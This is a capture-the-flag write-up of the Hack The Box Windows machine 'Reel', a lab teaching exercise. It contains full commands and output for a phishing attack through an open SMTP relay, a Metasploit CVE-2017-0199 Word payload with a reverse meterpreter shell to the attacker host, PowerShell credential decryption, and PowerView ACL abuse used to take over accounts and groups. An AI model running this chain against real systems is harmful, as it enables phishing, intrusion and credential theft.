HTB - Reel

Machine Info

Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.

Enumeration

Scope

IP Address: 10.10.10.77

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE      REASON
21/tcp  open  ftp          syn-ack
22/tcp  open  ssh          syn-ack
25/tcp  open  smtp         syn-ack
135/tcp open  msrpc        syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan

PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18  12:19AM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp  open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp  open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie: 
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds 
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2024-07-12T12:48:32+01:00
| smb2-time: 
|   date: 2024-07-12T11:48:30
|_  start_date: 2024-07-12T11:40:43
|_clock-skew: mean: -19m53s, deviation: 34m36s, median: 4s

* Open ports: 21,22,25,135,139,445
* Services: FTP - SSH - SMTP - RPC - SMB
* Versions: Windows Server 2012 R2 Standard 9600 - OpenSSH 7.6 
* Important Notes: FQDN: REEL.HTB.LOCAL - Domain name: HTB.LOCAL - Anonymous FTP login allowed

FTP Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip

<snip>
FINISHED --2024-07-12 07:48:01--
Total wall clock time: 3.0s
Downloaded: 5 files, 17K in 0.2s (75.3 KB/s)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ls                
10.10.10.77  Nmap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ tree 10.10.10.77     
10.10.10.77
└── documents
    ├── AppLocker.docx
    ├── Windows Event Forwarding.docx
    └── readme.txt

I downloaded these files but I found nothing interesting inside them. except the email address of the creator of these files nico@megabank.com

RPC Enumeration

No data from rpcclient

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ rpcclient -U "%" $ip                          
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

SMB Enumeration

I can't list the shares with cme or smbclient

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ smbclient -N -L //$ip
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.77 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available  


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB         10.10.10.77     445    REEL             [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.77     445    REEL             [+] HTB.LOCAL\: 
SMB         10.10.10.77     445    REEL             [-] Error enumerating shares: STATUS_ACCESS_DENIED


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB         10.10.10.77     445    REEL             [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.77     445    REEL             [-] HTB.LOCAL\guest: STATUS_ACCOUNT_DISABLED 

SMTP Enumeration

I always scan for open-relay if I found SMTP server to check for the possibility of sending arbitrary emails that can be used for phishing.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ nmap -p25 --script smtp-open-relay $ip -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 08:05 EDT
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)

Initial Access

Shell as nico

I got a hint from community that there is a CVE affects Microsoft office that allow RCE via phishing emails. CVE-2017–0199

since we can send arbitrary emails as smtp server is Open relay, we can craft a payload and send it via smtp server to get remote code execution

There is a Metasploit module that can generate the malicious payload we want to send

msf6 > search CVE-2017-0199

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/office_word_hta  2017-04-14       excellent  No     Microsoft Office Word Malicious Hta Execution

msf6 > use 0

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/fileformat/office_word_hta) > options

Module options (exploit/windows/fileformat/office_word_hta):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.doc          yes       The file name.
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
                                        hine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   default.hta      yes       The URI to use for the HTA file


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf6 exploit(windows/fileformat/office_word_hta) > set srvhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > set srvport 80
msf6 exploit(windows/fileformat/office_word_hta) > set lhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > run -j

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.16.7:4444 
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/kali/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.7/default.hta
[*] Server started.

Send email to the user we found with sendEmail command with the attachment generated from Metasploit

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ sendemail -t nico@megabank.com -f blind@htb.com -u 'Are you Reel!!!' -m "Click me" -a /home/kali/.msf4/local/msf.doc -s $ip 

Jul 12 11:27:25 kali sendemail[77146]: Email was sent successfully!

At Metasploit, I got a connection back as nico user

[*] Sending stage (176198 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.77:58083) at 2024-07-12 11:27:45 -0400

msf6 exploit(windows/fileformat/office_word_hta) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: HTB\nico

Get the flag from user's desktop

meterpreter > shell
Process 3524 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\Users\nico
C:\Users\nico>type Desktop\user.txt

4b1fa88985d787becfxxxxxxxxxxxxxx

User Flag: 4b1fa88985d787becfxxxxxxxxxxxxxx

Privilege Escalation

Shell as Tom

C:\Users\nico>tree /F

Folder PATH listing
Volume serial number is FFFFFFB9 CEBA:B613
C:.
Contacts
Desktop
       cred.xml
       user.txt
<snip>

It's a PowerShell credential file

We can decrypt these credentials with Cli-xml native tool

C:\Users\nico>PowerShell -c "$credentials= Import-Clixml -Path C:\Users\nico\Desktop\cred.xml; $credentials.GetNetworkCredential().username; $credentials.GetNetworkCredential().password"

Tom
1ts-mag1c!!!

We don't have any remote access solution to the machine except ssh, Let's try to authenticate with tom with ssh

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh tom@$ip
tom@10.10.10.77's password:                                                                                                                                                     
tom@REEL C:\Users\tom> 

There are multiple interesting files in the tom's home directory, I will explore them

tom@REEL C:\Users\tom>tree /F                                                                                               
C:.
├───Contacts
├───Desktop
│   └───AD Audit
│       │   note.txt
│       │
│       └───BloodHound
│           │   PowerView.ps1
│           │
│           └───Ingestors
│                   acls.csv
│                   BloodHound.bin
│                   BloodHound_Old.ps1
│                   SharpHound.exe
│                   SharpHound.ps1  

Note.txt

tom@REEL C:\Users\tom>type "Desktop\AD Audit\note.txt"                                                                          
Findings:                                                                                                                       
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).                                  

Maybe we should re-run Cypher query against other groups we've created.  

The other files are PowerView.ps1 which can be used to enumerate AD Environment and exploit misconfiguration, Sharphound.exe is the Ingestor of bloodhound that collect information about the domain.

The most interesting file is acls.csv, I will copy it to my kali machine after starting local smb server

tom@REEL C:\Users\tom>net use n: \\10.10.16.7\share /user:blind0bandit blind0bandit
The command completed successfully.                                                                                           
tom@REEL C:\Users\tom>copy "Desktop\AD Audit\BloodHound\Ingestors\acls.csv" n:                                                  
1 file(s) copied.  

I opened the file and start to explore it manually as I tried to upload it to bloodhound, but it failed for me.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ open acls.csv

• Searching for the user tom, I found the following:

  • user tom has WriteOwner on user claire

  • user claire has WriteDacl on group backup_admins

• It's a potential path we can take to takeover claire account then authenticate with this account and modify the ACLs of backup_admins group to be able to add ourselves in that group which seems to be high privileges group

• Using PowerView.ps1 already exists on the machine can be useful to execute this attack path

Shell as Claire

Abuse WriteOwner to get ownership of claire user to be able to modify its access control and get the privileges to change its password

set-domainobjectowner -Identity claire -OwnerIdentity tom
add-domainobjectacl -TargetIdentity claire -PrincipalIdentity tom -Rights Resetpassword

Change password of claire user

$pass = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
set-domainuserpassword -identity claire -accountpassword $pass

abuse WriteDacl to add GenericAll right to user cliare on group backup_admins so I have full control on that group

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Backup_admins" -PrincipalIdentity "htb.local\claire"

ssh with claire and add me to the target group

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh claire@$ip
claire@10.10.10.77's password:

claire@REEL C:\Users\claire>    

net group "backup_admins" claire /add

you must logout and login in again for the changes to take effect and be fast, too :)

backup_admins group has Full access on Administrator Folder from the output of icacls below

claire@REEL C:\Users>icacls Administrator                                                                                       
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
	HTB\Backup_Admins:(OI)(CI)(F)
	HTB\Administrator:(OI)(CI)(F)
	BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files  

I tried to get the flag but it seems I don't have access to

claire@REEL C:\Users\Administrator>type Desktop\root.txt
Access is denied. 

Shell as administrator

Exploring administrator home directory shows several .ps1 scripts

claire@REEL C:\Users\Administrator>tree /F

├───Desktop
│   │   root.txt
│   │
│   └───Backup Scripts
│           backup.ps1
│           backup1.ps1
│           BackupScript.ps1
│           BackupScript.zip
│           folders-system-state.txt
│           test2.ps1.txt    

I found the admin password on one of these files

claire@REEL C:\Users\Administrator>type "Desktop\Backup Scripts\BackupScript.ps1"

# admin password
$password="Cr4ckMexxxxxxxxx"
<snip>

And we have a shell as admin

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh administrator@$ip

administrator@10.10.10.77's password:                                                              
administrator@REEL C:\Users\Administrator>type Desktop\root.txt
e622958df7390059522xxxxxxxxxxxxxx

Root Flag: e622958df7390059522xxxxxxxxxxxxxx